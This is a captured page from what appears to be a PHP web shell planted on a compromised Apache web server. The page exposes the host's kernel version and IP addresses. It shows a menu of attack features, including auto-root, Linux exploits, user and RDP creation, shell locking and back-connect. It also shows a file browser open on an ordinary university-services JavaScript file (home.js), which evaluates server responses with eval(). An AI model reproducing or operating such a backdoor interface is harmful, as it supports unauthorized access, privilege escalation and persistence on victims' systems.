Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.248.150
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
gack /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
Chart.Core.js
70.32
KB
-rwxr-xr-x
Chart.Doughnut.js
6.2
KB
-rwxr-xr-x
Chart.js
115.34
KB
-rwxr-xr-x
cms.js
18.45
KB
-rwxr-xr-x
control.js
18.43
KB
-rwxr-xr-x
dytable.js
21.59
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
functions.js
391
B
-rwxr-xr-x
home.js
6.58
KB
-rwxr-xr-x
index.js
3.87
KB
-rwxr-xr-x
jquery-1.7.2.min.js
92.62
KB
-rwxr-xr-x
jquery.flexslider-min.js
10.87
KB
-rwxr-xr-x
loadtable.js
10.47
KB
-rwxr-xr-x
modernizr.custom.js
6.76
KB
-rwxr-xr-x
script.js
1.08
KB
-rwxr-xr-x
validate.js
10.64
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : home.js
/* function loadstudenttabs(mode) { document.getElementById("cont_acpt_univ").style.display = "none"; var services_url = "services.html"; var examapp_url = "http://www.logisys.net.in/student/"+mode var result_url = "http://www.logisys.net.in/student/"+mode var tabs = "<button type='submit' class='button button2' onclick=redirectservice('"+mode+"') ><span>Online Services</span></button>"; tabs += "<button type='submit' class='button button2' onclick=redirectpage('"+examapp_url+"') ><span>Exam Application form</span></button>"; tabs += "<button type='submit' class='button button2' onclick=redirectpage('"+result_url+"') ><span>Results</span></button>"; document.getElementById("cont_curr_univ").innerHTML = tabs; document.getElementById("cont_curr_univ").style.display = "block"; } */ function loadexamtabs(mode) { var reurl = "http://www.logisys.net.in/student/"+mode; window.location.href = reurl; } function loadteachertabs(mode) { document.getElementById("cont_acpt_univ").style.display = "none"; var reurl = "http://www.logisys.net.in/"+mode; var tabs = "<button type='submit' class='button button2' onclick=redirectpage('"+reurl+"') ><span>OASIS Login</span></button>"; document.getElementById("cont_curr_univ").innerHTML = tabs; document.getElementById("cont_curr_univ").style.display = "block"; } function loadresultstabs(mode) { //document.getElementById("cont_acpt_univ").style.display = "none"; var reurl = "http://www.logisys.net.in/results/"+mode; /* var tabs = "<button type='submit' class='button button2' onclick=redirectpage('"+reurl+"') ><span>Results</span></button>"; document.getElementById("cont_curr_univ").innerHTML = tabs; document.getElementById("cont_curr_univ").style.display = "block"; */ window.location.href = reurl; } function redirectDegcrtpage(mode) { var redurl = "http://www.logisys.net.in/cnv/"+mode+"/indexpage.php"; window.location.href = redurl; } function redirectpage(redurl) { window.location.href = redurl; } function redirectservice(mode) { setCookie("curuniv",mode); var services_url = "services.html"; window.location.href = services_url; } function loadservicepage(mode) { setCookie("curuniv",mode); var services_url = "services.html"; window.location.href = services_url; } function redirectCollegepage() { var redurl = "http://www.logisys.net.in/kus"; window.location.href = redurl; } function loadonlineservices() { $("#T5").inputmask("d/m/y", { "placeholder": "dd/mm/yyyy" }); $("#T19").inputmask("d/m/y", { "placeholder": "dd/mm/yyyy" }); $("#T22").inputmask("d/m/y", { "placeholder": "dd/mm/yyyy" }); $("#T25").inputmask("d/m/y", { "placeholder": "dd/mm/yyyy" }); var crmode = getCookie("curuniv"); if(trim(crmode) != '') { var urlarr = window.location.pathname.split('/'); var $url="http://"+window.location.host+"/"; $hoststr = ''; for(var j=1;j<urlarr.length-1;j++) { $hoststr += window.location.pathname.split('/')[j]+"/"; } $host_url = $url+$hoststr+"app.php?cdb="+crmode+"&a="; CMS.GetCMSDropDownMenuValues(); } else { window.location.href = "index.html"; } } function saveservicedetails() { //////To read Multiple Records/////// var inputFileds = document.getElementsByTagName('input'); var chkCnt = 0; var rowCnt = 0; var service_arr = {}; for (var counter=0; counter < inputFileds.length; counter++) { if ( inputFileds[counter].type.toUpperCase()=='TEXT' && inputFileds[counter].name == "servicedet" ) { ++rowCnt; if(document.getElementById(rowCnt+'AT6').value != 'T') { ++chkCnt; service_arr[chkCnt] = new Object(); service_arr[chkCnt]['code'] = document.getElementById(rowCnt+'AT1').value; service_arr[chkCnt]['name'] = document.getElementById(rowCnt+'AT2').value; service_arr[chkCnt]['proc'] = document.getElementById(rowCnt+'AT3').value; service_arr[chkCnt]['days'] = document.getElementById(rowCnt+'AT4').value; service_arr[chkCnt]['order'] = document.getElementById(rowCnt+'AT5').value; } } } var dataString ="&service_arr="+encodeURIComponent(JSON.stringify(service_arr)); $.ajax({ type:"POST", url:$host_url+"saveservicedetails", data:dataString, cache:false, success:function($responce) { $responce = eval('('+$responce+')'); if($responce.error_code == 0) { alert($responce.data); } else alert($responce.data); } }); } function savefeeheaddetails() { //////To read Multiple Records/////// var inputFileds = document.getElementsByTagName('input'); var chkCnt = 0; var rowCnt = 0; var fee_arr = {}; for (var counter=0; counter < inputFileds.length; counter++) { if ( inputFileds[counter].type.toUpperCase() == 'TEXT' && inputFileds[counter].name == "feeheaddet" ) { ++rowCnt; if(document.getElementById(rowCnt+'BT5').value != 'T') { ++chkCnt; fee_arr[chkCnt] = new Object(); fee_arr[chkCnt]['code'] = document.getElementById(rowCnt+'BT1').value; fee_arr[chkCnt]['fee'] = document.getElementById(rowCnt+'BT2').value; fee_arr[chkCnt]['desc'] = document.getElementById(rowCnt+'BT3').value; fee_arr[chkCnt]['order'] = document.getElementById(rowCnt+'BT4').value; } } } var dataString ="&fee_arr="+encodeURIComponent(JSON.stringify(fee_arr)); $.ajax({ type:"POST", url:$host_url+"savefeeheaddetails", data:dataString, cache:false, success:function($responce) { $responce = eval('('+$responce+')'); if($responce.error_code == 0) { alert($responce.data); } else alert($responce.data); } }); } function saveservfeedetails() { //////To read Multiple Records/////// var inputFileds = document.getElementsByTagName('input'); var chkCnt = 0; var rowCnt = 0; var sfee_arr = {}; for (var counter=0; counter < inputFileds.length; counter++) { if ( inputFileds[counter].type.toUpperCase() == 'TEXT' && inputFileds[counter].name == "feeheaddet" ) { ++rowCnt; if(document.getElementById(rowCnt+'CT5').value != 'T') { ++chkCnt; sfee_arr[chkCnt] = new Object(); sfee_arr[chkCnt]['deg'] = document.getElementById(rowCnt+'CT1').value; sfee_arr[chkCnt]['cat'] = document.getElementById(rowCnt+'CT2').value; sfee_arr[chkCnt]['fcd'] = document.getElementById(rowCnt+'CT3').value; sfee_arr[chkCnt]['fee'] = document.getElementById(rowCnt+'CT4').value; } } } var dataString ="&sfee_arr="+encodeURIComponent(JSON.stringify(sfee_arr)); $.ajax({ type:"POST", url:$host_url+"saveservfeedetails", data:dataString, cache:false, success:function($responce) { $responce = eval('('+$responce+')'); if($responce.error_code == 0) { alert($responce.data); } else alert($responce.data); } }); }
Close